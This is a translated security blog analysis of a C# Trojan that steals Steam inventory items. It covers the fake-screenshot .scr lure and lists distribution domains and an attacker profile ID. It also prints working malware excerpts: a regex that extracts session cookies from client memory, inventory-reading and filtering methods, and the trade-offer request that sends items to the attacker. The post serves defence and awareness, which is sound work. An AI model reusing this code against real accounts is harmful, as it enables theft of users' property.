Trojan Stealing Steam Items

Although about this Trojan is known for a long time, it acquired a real mass character at the end of November.
The interesting thing about him is that instead of the usual theft of usernames and passwords, from which you can easily defend yourself, he directly steals items from your Steam inventory.

Valve has long been aware of the problem, but did not take any special actions for several months, although the current wave can be easily stopped by minor changes in the Steam client.

In the inventory of Steam items are stored from several popular games Valve, some of which can cost a very impressive (by the standards of colored pixels) amount. It also stores items related to the Steam itself (gift copies of games, profile backgrounds, emoticons, etc.).
')

Infection

Infection occurs as follows. A message arrives to the unsuspecting user, which contains a link to an alleged screenshot of the inventory, with a proposal to exchange items. After clicking on the link, the .scr file starts automatically, having an icon that looks like a thumbnail of the image. Considering that the default display of an extension in Windows is turned off, and even if it is turned on, .scr may well be perceived as a “screenshot”, everything looks very plausible.



After launching the file, the Trojan unpacks a picture from the resources and opens it (in the picture there is really a screenshot of the inventory or some item). Some of the modifications are prescribed in autostart.



Parallel to this, the Trojan retrieves cookies from the memory of the Steam client, makes a request to steamcommunity.com to retrieve the session identifier, searches the inventory for suitable items and sends them via the “Trade Request” to previously prepared intruders.

By the way, while writing this article, I found another version of the Trojan (obviously, based on public sources), which was written a little differently and had additional functions, for example, sending messages through a list of friends.

By the way, the original name of the assembled file was “Maksim Steam Offer.exe”, which the reflector kindly told me, and the profile identifier to which the stolen items go - 76561198009197365. The domain from which the Trojan was distributed (and is distributed at the time of writing) is “puush -me.com ”(for those who decide to play detective, go from under the virtual machine). And yes, he is there neobfustsirovanny.

Several domains that I managed to collect:

take-screen.org
fastscreen.org
my-screenshot.net
puush-me.com
picturesfast.net
screen-url.com

Remarkably, most of them are registered with Russian registrars.

We pick source codes

The Trojan itself is written in C #, which is very unusual for this kind of software. The source files I downloaded from the Internet were several files: WinApis.cs, containing several methods for working with winapi.cs, Http.cs, containing methods for emulating requests from the steam client (up to the last header) and Program.cs, in which and all the action took place.

Interestingly, the total amount of code is only about 500 lines.

Cookies from the client’s memory are received by both variations of the Trojan as follows:

MatchCollection matchs = new Regex("7656119[0-9]{10}%7c%7c[A-F0-9]{40}", RegexOptions.IgnoreCase).Matches(preparedIDs); 

Then, using the received cookies, a request is sent to steamcommunity.com to get the session identifier, for which there is a separate (and rather big) method in Http.cs.

Having received the identifier, the trojan, using api steamcommunity, gets the contents of the inventory:

 private static List<string[]> GetItems(string steamID, string appID) { List<string[]> items = new List<string[]>(); while (true) { string link = "profiles/" + steamID + "/inventory/json/" + appID + "/2/"; string json = Http.SteamWebRequest(cookiesContainer, link, null, ""); try { JObject inventory = JObject.Parse(json); if (((inventory.SelectToken("success") != null) && ((bool)inventory.SelectToken("success"))) && (inventory.SelectToken("rgDescriptions")).First != null) { IJEnumerable<JToken> descriptionsBase = inventory.SelectToken("rgDescriptions").Values(); foreach (JToken eachItem in inventory.SelectToken("rgInventory").Values()) { JToken infoAbout = descriptionsBase.Where(each => each["classid"].ToString() == eachItem["classid"].ToString()).First(); if (infoAbout["tradable"].ToString() == "1") { string[] item = new string[] { appID, eachItem["amount"].ToString(), eachItem["id"].ToString(), infoAbout["market_name"].ToString(), infoAbout["type"].ToString().ToLower() }; if (!items.Contains(item)) { items.Add(item); } } } } break; } catch { return null; } } return items; } 

Sorts it by the specified filters:

 listed = FilterByRarity(listed, "common,"); private static List<string[]> FilterByRarity(List<string[]> input, string filter) { string[] filters = filter.Split(','); List<string[]> output = new List<string[]>(); for (int i = 0; i < input.Count; i++) { for (int x = 0; x < filters.Length; x++) { string[] types = input[i][4].Split(' '); for (int c = 0; c < types.Length; c++) { if (types[c] == filters[x] && !output.Contains(input[i])) { output.Add(input[i]); break; } } } } return output; } 

And suitable items (often quite expensive) are sent to pre-prepared accounts:

 private static string sentItems(string sessionID, string items, string[] Offer) { return Http.SteamWebRequest(cookiesContainer, "tradeoffer/new/send", "sessionid=" + sessionID + "&partner=" + Offer[0] + "&tradeoffermessage=&json_tradeoffer=%7B%22newversion%22%3Atrue%2C%22version%22%3A2%2C%22me%22%3A%7B%22assets%22%3A%5B" + items + "%5D%2C%22currency%22%3A%5B%5D%2C%22ready%22%3Afalse%7D%2C%22them%22%3A%7B%22assets%22%3A%5B%5D%2C%22currency%22%3A%5B%5D%2C%22ready%22%3Afalse%7D%7D&trade_offer_create_params=%7B%22trade_offer_access_token%22%3A%22" + Offer[2] + "%22%7D", "tradeoffer/new/?partner=" + Offer[1] + "&token=" + Offer[2]); } 

One precautionary measure - use linux; do not open the links sent by strangers and use antiviruses (they detect it perfectly).